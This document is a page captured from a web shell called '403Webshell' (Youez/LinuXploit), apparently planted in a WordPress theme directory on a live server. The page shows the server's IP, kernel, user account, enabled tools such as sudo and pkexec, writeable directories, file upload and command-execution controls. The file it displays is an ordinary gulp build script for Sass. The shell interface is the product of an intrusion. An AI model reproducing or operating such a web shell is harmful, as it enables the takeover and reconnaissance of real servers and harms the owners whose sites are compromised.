403Webshell
Server IP : 208.109.34.209  /  Your IP : 216.73.217.134
Web Server : Apache
System : Linux 209.34.109.208.host.secureserver.net 5.14.0-687.29.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jul 23 16:18:48 EDT 2026 x86_64
User : oceanproject ( 1012)
PHP Version : 8.1.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/oceanproject/public_html/wp-content/themes/reda/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/oceanproject/public_html/wp-content/themes/reda/gulpfile.js
var gulp = require('gulp');
var sass = require('gulp-sass');
var notify = require('gulp-notify');
var autoprefixer = require('gulp-autoprefixer');

var paths = {
	sass : 'assets/scss/**/*.scss',
};



gulp.task('watch', function() {
	gulp.watch(paths.sass, ['styles']);
});


gulp.task('styles', function() {
  return gulp.src('assets/scss/app.scss')
    .pipe(sass({
        errLogToConsole: false,
    }).on('error', reportError ))
    .pipe(autoprefixer('last 2 version', 'safari 5', 'ie 8', 'ie 9', 'opera 12.1', 'ios 6', 'android 4'))
    .pipe(gulp.dest('./assets/css/'))
    .pipe(notify({ message: 'Styles task complete' }));
});

var reportError = function (error) {
    notify({
        title: 'Pieronski hasiok!',
        message: error.message,
    }).write(error);

    console.log(error.toString());

    this.emit('end');
};

gulp.task('default', ['styles', 'watch']);


Youez - 2016 - github.com/yon3zu
LinuXploit